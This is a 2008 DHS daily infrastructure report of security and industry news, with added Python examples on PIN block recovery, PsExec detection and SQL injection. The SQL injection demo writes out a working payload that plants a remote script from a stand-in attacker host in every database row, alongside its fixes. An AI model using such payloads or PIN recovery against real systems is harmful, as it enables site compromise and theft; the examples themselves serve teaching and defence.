Department of Homeland Security Daily Open Source Infrastructure Report

Thursday, July 3, 2008

Daily Report

Over the past four decades numerous studies have shown that pesticides can move downward from the land surface through the unsaturated zone to reach the water table at detectable concentrations. (See item 22)

IDG News Service reports that the writers of the Coreflood Trojan horse program have managed to infect hundreds of thousands of computers, including more than 14,000 within one unnamed global hotel chain. (See item 32)

Banking and Finance Sector

8. July 1, Associated Press – (National) Citibank ATM breach reveals PIN security problems. Hackers broke into Citibank’s network of ATMs inside 7-Eleven stores and stole customers’ PINs, according to recent court filings that revealed a disturbing security hole in the most sensitive part of a banking record. The scam netted the alleged identity thieves millions of dollars. It also indicates that the criminals obtained personal identification numbers (PINs) by attacking the back-end computers responsible for approving cash withdrawals, rather than the ATMs themselves. The case against three people in U.S. District Court for the Southern District of New York highlights a significant problem: hackers are targeting the ATM system’s infrastructure, which is increasingly built on Microsoft Corp.’s Windows operating system and allows machines to be remotely diagnosed and repaired over the Internet. Despite industry standards that call for protecting PINs with strong encryption from the moment they are entered, some ATM operators apparently are not doing so. The PINs appear to be leaking while in transit between the ATMs and the computers that process the transactions. It is unclear how many Citibank customers were affected by the breach, which extended at least from October 2007 to March 2008 and was first reported by … The bank has nearly 5,700 Citibank-branded ATMs inside 7-Eleven Inc. stores throughout the U.S., but it does not own or operate any of them.
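What “PINs leaking in transit” means in practice can be shown with the PIN block that ATM networks carry. The following is an added example, not code from the AP report or from Citibank or 7-Eleven; the report does not say which PIN block format the affected ATMs used, so ISO 9564-1 format 0 is assumed here because it is the format commonly used on ATM networks, and the PAN and PIN values are constructed test data. The point it makes is that the clear block is only an XOR of the PIN against the card number, and the card number travels in the same authorization message, so any hop that sees the block unencrypted sees the PIN.

```python
"""ISO 9564-1 format 0 PIN block: construction, recovery, and why it must be
encrypted before it leaves the ATM.

Added example, not from the AP report or from Citibank/7-Eleven. ISO format 0
is assumed (the report does not name the format); PAN and PIN are constructed.
"""

def pin_field(pin: str) -> bytes:
    """Nibbles: control '0', PIN length, PIN digits, then 'F' padding to 16 hex digits."""
    if not (pin.isdigit() and 4 <= len(pin) <= 12):
        raise ValueError("PIN must be 4 to 12 decimal digits")
    return bytes.fromhex(f"0{len(pin):X}{pin}".ljust(16, "F"))

def pan_field(pan: str) -> bytes:
    """Four zero nibbles, then the 12 rightmost PAN digits excluding the Luhn check digit."""
    if not (pan.isdigit() and 13 <= len(pan) <= 19):
        raise ValueError("PAN must be 13 to 19 decimal digits")
    return bytes.fromhex("0000" + pan[-13:-1])

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def clear_pin_block(pin: str, pan: str) -> bytes:
    """The 8-byte block an ATM's PIN pad feeds into its encryption step."""
    return _xor(pin_field(pin), pan_field(pan))

def recover_pin(block: bytes, pan: str) -> str:
    """Undo the XOR with the PAN and validate the layout; raises if it does not parse."""
    if len(block) != 8:
        raise ValueError("ISO-0 PIN block is exactly 8 bytes")
    field = _xor(block, pan_field(pan)).hex().upper()
    length = int(field[1], 16)
    pin, pad = field[2:2 + length], field[2 + length:]
    if field[0] != "0" or not 4 <= length <= 12 or not pin.isdigit() or pad != "F" * len(pad):
        raise ValueError("not a valid ISO-0 PIN block for this PAN")
    return pin

def try_recover(block: bytes, pan: str):
    """Recovery as someone on the wire would attempt it: None when the PAN does not fit."""
    try:
        return recover_pin(block, pan)
    except ValueError:
        return None

if __name__ == "__main__":
    # Constructed values. The authorization request carries the PAN (from Track 2)
    # alongside the PIN block, so an unencrypted block gives up the PIN directly.
    pan, pin = "4000123456789010", "1234"
    block = clear_pin_block(pin, pan)
    print(block.hex().upper())                       # 041235DCBA9876FE
    print(try_recover(block, pan))                   # 1234
    print(try_recover(block, "5100001111222233"))    # None: the block is bound to its PAN
```

The industry standards the article refers to (ISO 9564 and the PCI PIN requirements) require that this block be Triple-DES encrypted under a PIN encryption key inside the ATM’s tamper-resistant PIN pad, and that every hop that re-keys it for the next network do so inside a hardware security module, so the clear block never exists on a general-purpose host. A Windows-based back end that decrypts PIN blocks in application memory, or a link where the operator never turned encryption on, is exactly where the recovery above becomes possible.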


9. July 1, KBMT 12 Beaumont – (Texas) BBB issues alert for phishing attack on area banks. The Better Business Bureau (BBB) in Southeast Texas warns all businesses and consumers in the area of a scam that spoofs area banks to entice recipients into handing over personal information. Orange Savings Bank was targeted last month, and the BBB has been flooded with calls today regarding Franklin Bank. Consumers are receiving automated phone calls, along with e-mails and even text messages, some late at night, asking for personal information.


Information Technology

32. July 2, IDG News Service – (National) Trojan lurks, waiting to steal admin passwords. The writers of a password-stealing Trojan horse program have managed to infect hundreds of thousands of computers, including more than 14,000 within one unnamed global hotel chain, by waiting for a system administrator to log onto an infected PC and then, with that administrator’s access, using a Microsoft administration tool to push the malicious software to other machines on the network. The criminals behind the Coreflood Trojan use it to steal banking and brokerage account usernames and passwords and have amassed a 50 GB database of such data from the machines they have infected, according to the director of malware research at security vendor SecureWorks. Since Microsoft shipped Windows XP Service Pack 2 with its locked-down default security settings in August 2004, attackers have had a harder time spreading malicious software across corporate networks, and widespread worm and virus outbreaks dropped off soon after its release. The Coreflood operators have nonetheless succeeded, thanks in part to PsExec, a Microsoft Sysinternals tool written to let administrators run legitimate programs on remote computers across their networks. Over the past 16 months, Coreflood’s authors have infected more than 378,000 computers. SecureWorks has counted thousands of infections on university networks and has found financial companies, hospitals, law firms, and even a U.S. state police agency with hundreds of infections each.
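The spreading technique described above leaves a recognizable trail on each target host, which is the practical handle a security team has on it. The following is an added example, not from the IDG article or from SecureWorks’ analysis of Coreflood. It assumes (my assumption, not stated in the article) the default PsExec behaviour: the tool copies PSEXESVC.exe to the target’s ADMIN$ share, registers it as a service (System log event 7045) and drives it over a network logon (Security log event 4624, logon type 3); the “-r” option renames the service but still drops the binary into %SystemRoot%. The event records are constructed in a flattened one-JSON-object-per-line form, not captured from a real incident.

```python
"""Flag PsExec-style remote service installs and the fan-out pattern they form.

Added example, not from the IDG article or SecureWorks. Assumes default PsExec
artifacts (event 7045 for PSEXESVC / a binary in %SystemRoot%, preceded by a
type-3 logon). SAMPLE_LOG is constructed data.
"""
import json
import re
from datetime import datetime, timedelta

SAMPLE_LOG = r'''
{"time": "2008-07-01T02:13:05", "host": "FIN-WS-017", "event_id": 4624, "logon_type": 3, "account": "CORP\\adm-jsmith", "src_ip": "10.20.30.40"}
{"time": "2008-07-01T02:13:06", "host": "FIN-WS-017", "event_id": 7045, "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe", "account": "LocalSystem"}
{"time": "2008-07-01T02:14:11", "host": "FIN-WS-018", "event_id": 4624, "logon_type": 3, "account": "CORP\\adm-jsmith", "src_ip": "10.20.30.40"}
{"time": "2008-07-01T02:14:12", "host": "FIN-WS-018", "event_id": 7045, "service_name": "svchelper", "image_path": "%SystemRoot%\\svchelper.exe", "account": "LocalSystem"}
{"time": "2008-07-01T09:00:00", "host": "FIN-WS-019", "event_id": 4624, "logon_type": 2, "account": "CORP\\bob", "src_ip": "-"}
{"time": "2008-07-01T09:30:00", "host": "FIN-WS-019", "event_id": 7045, "service_name": "VendorUpdater", "image_path": "C:\\Program Files\\Vendor\\updater.exe", "account": "LocalSystem"}
'''

# A service binary sitting directly in the Windows directory, as PsExec drops it.
SYSTEMROOT_DROP = re.compile(r"^%SystemRoot%\\[^\\]+\.exe$", re.IGNORECASE)
LOGON_WINDOW = timedelta(seconds=60)

def parse_events(text: str) -> list:
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["time"] = datetime.fromisoformat(ev["time"])
            events.append(ev)
    return sorted(events, key=lambda e: e["time"])

def preceding_network_logon(events: list, idx: int):
    """Most recent 4624 logon-type-3 event on the same host within LOGON_WINDOW before events[idx]."""
    target = events[idx]
    for ev in reversed(events[:idx]):
        if target["time"] - ev["time"] > LOGON_WINDOW:
            break
        if ev["host"] == target["host"] and ev["event_id"] == 4624 and ev.get("logon_type") == 3:
            return ev
    return None

def flag_psexec(events: list) -> list:
    """Return one finding per 7045 service install that carries at least two PsExec indicators."""
    findings = []
    for idx, ev in enumerate(events):
        if ev["event_id"] != 7045:
            continue
        reasons = []
        if ev.get("service_name", "").lower() == "psexesvc":
            reasons.append("default PsExec service name")
        if SYSTEMROOT_DROP.match(ev.get("image_path", "")):
            reasons.append("service binary dropped directly into %SystemRoot%")
        logon = preceding_network_logon(events, idx)
        if logon:
            delta = int((ev["time"] - logon["time"]).total_seconds())
            reasons.append(f"installed {delta}s after network logon by {logon['account']} from {logon['src_ip']}")
        if len(reasons) >= 2:   # any single indicator alone is noisy; require corroboration
            findings.append({
                "host": ev["host"],
                "time": ev["time"].isoformat(),
                "service_name": ev["service_name"],
                "src_ip": logon["src_ip"] if logon else None,
                "account": logon["account"] if logon else None,
                "reasons": reasons,
            })
    return findings

def fan_out(findings: list) -> dict:
    """Hosts touched per source address: one machine installing services on many is the spread pattern."""
    hosts = {}
    for f in findings:
        if f["src_ip"]:
            hosts.setdefault(f["src_ip"], []).append(f["host"])
    return hosts

if __name__ == "__main__":
    found = flag_psexec(parse_events(SAMPLE_LOG))
    for f in found:
        print(f["host"], f["service_name"], "|", "; ".join(f["reasons"]))
    print(fan_out(found))
```

The renamed service on FIN-WS-018 is caught by the drop location plus the preceding network logon, while the vendor updater on FIN-WS-019 (interactive logon, binary under Program Files) is not flagged. In a real estate the source address in the fan-out map is the machine to pull first: in the scenario the article describes it is the administrator’s own workstation, already infected.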


33. July 2, Computerworld – (International) SQL attack lobbed onto ATP site. Visitors to the Association of Tennis Professionals (ATP) Web site may have been infected with spyware after apparently lax security allowed a malicious script to be injected across its pages. The SQL injection attack acts as a conduit for spyware and Trojans to be downloaded to victims’ machines. While the manner of attack is nothing new, Microsoft’s TechNet warned that it has detected an increase in this type of attack against Web sites built on Microsoft ASP and ASP.NET. It attributes the vulnerability to poor Web application security practices rather than product flaws. “These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database,” the site reads. “When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.”
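The coding practice TechNet is pointing at, and the fix, can be shown in a few lines. The following is an added example, not code from the ATP site, Computerworld or Microsoft. The 2008 mass-injection attacks hit ASP/ASP.NET pages that concatenated a request parameter into a SQL string and ran it through a driver that accepts statement batches, so a numeric parameter could carry a second UPDATE that appends a <script> tag to text columns; the page then served that tag to every visitor. Assumptions here: the schema, page handlers and the //attacker.example marker are constructed for the demonstration, and sqlite3’s executescript() stands in for a batch-accepting database driver.

```python
"""Mass SQL injection of the kind described above, reproduced against SQLite,
with the two controls that stop it: bound parameters on the write path and
output encoding on the read path.

Added example, not from the ATP site, Computerworld or Microsoft TechNet.
Schema, handlers and payload marker are constructed; executescript() stands
in for a driver that runs statement batches.
"""
import html
import sqlite3

# Constructed marker standing in for the remote script the real attacks referenced.
INJECTED_TAG = '<script src="//attacker.example/j.js"></script>'

def setup_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE comments(article_id INTEGER, body TEXT);
        INSERT INTO news VALUES (1, 'Wimbledon preview', 'The draw is out.');
        INSERT INTO news VALUES (2, 'Rankings update', 'No change at the top.');
    """)
    return db

def post_comment_vulnerable(db, article_id: str, text: str) -> None:
    # Equivalent of classic ASP:
    #   Conn.Execute("INSERT ... VALUES (" & Request("id") & ", '" & Request("text") & "')")
    sql = f"INSERT INTO comments(article_id, body) VALUES ({article_id}, '{text}')"
    db.executescript(sql)   # batch semantics: every statement in the string runs

def post_comment_safe(db, article_id: str, text: str) -> None:
    # Validate the numeric input, then bind both values so attacker-controlled
    # text can never be parsed as SQL syntax.
    db.execute("INSERT INTO comments(article_id, body) VALUES (?, ?)",
               (int(article_id), text))
    db.commit()

def safe_insert_rejected(db, article_id: str, text: str) -> bool:
    """True when the safe handler refuses the input instead of running it."""
    try:
        post_comment_safe(db, article_id, text)
        return False
    except ValueError:
        return True

def mass_injection_payload() -> str:
    # Closes the INSERT, appends the tag to every row of a text column, and
    # comments out the remainder of the original statement.
    return f"1, 'x'); UPDATE news SET body = body || '{INJECTED_TAG}'; --"

def article_bodies(db) -> list:
    return [row[0] for row in db.execute("SELECT body FROM news ORDER BY id")]

def render_body_vulnerable(body: str) -> str:
    return f"<p>{body}</p>"               # stored data echoed raw: an injected tag executes in the browser

def render_body_safe(body: str) -> str:
    return f"<p>{html.escape(body)}</p>"  # output encoding: a poisoned row displays as text and does not run

if __name__ == "__main__":
    db = setup_db()
    post_comment_vulnerable(db, mass_injection_payload(), "great match")
    for body in article_bodies(db):
        print(render_body_vulnerable(body))
        print(render_body_safe(body))
    print("safe handler rejected payload:", safe_insert_rejected(setup_db(), mass_injection_payload(), "x"))
```

Both controls are needed. Parameterization closes the write path, but a site that was already hit still has the tag stored in its rows, and only encoding on output keeps those pages from delivering it while the data is cleaned up.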


34. July 1, Ars Technica – (International) x64 kernel patch causes random restarts, fix on the way. Microsoft has disclosed that update 932596, a patch released for the Kernel Patch Protection feature included with x64 versions of Windows Server 2003, Windows Vista, and Windows Server 2008, appears to be causing random restarts on certain machines. A Stop error is generated (error code 0x0000001E, 0x000000D1, or another Stop error code). Windows x86 versions are not affected since they do not include Kernel Patch Protection (also known as PatchGuard), a technology meant to prevent third-party software from modifying the core of the operating system. According to KB article 950772, Microsoft has a hotfix ready but has not yet released it.


35. July 1, IDG News Service – (International) Study: Unpatched Web browsers prevalent on the Internet. Only 59.1 percent of people use up-to-date, fully patched Web browsers, leaving the remainder exposed to the growing number of attackers who target known browser flaws, according to a new study published by researchers in Switzerland. The study, conducted by researchers at the Swiss Federal Institute of Technology, Google and IBM Internet Security Systems and published Tuesday, is one of the most comprehensive analyses of which Web browser versions people are actually using on the Internet. Web browsers are often a weak link in the security chain, as software vulnerabilities can make it easy for hackers to gain control of a PC. When that happens, hackers can perform malicious acts such as stealing personal data or turning PCs into spam-spewing drones. The researchers found that although software vendors provide patches for security problems, it can take days, weeks, or months before people update their applications, and in the meantime those users remain at risk.


Communications Sector

36. July 1, Memphis Business Journal – (Tennessee) AT&T to invest $400M in Tenn. infrastructure. AT&T Inc. will invest $400 million in the implementation of new video services in Tennessee, the company announced Tuesday. The telecom giant will offer video services that require fiber network upgrades, further broadband deployment, and Internet-based technologies, the company said. AT&T’s planned infrastructure will for the first time bring its U-verse services, video carried over Internet protocol, to the state. The move is a result of a new state law AT&T had lobbied for. AT&T-backed House Bill 1421, signed into law in May, was met with resistance last year from the cable industry, primarily Comcast Corp. In the past, local governments had jurisdiction over who was allowed to provide information and entertainment services using their towns’ rights-of-way. The new law, which creates a single statewide franchise agreement in place of separate negotiations with each municipality, opened the door for AT&T to offer its television services in Tennessee.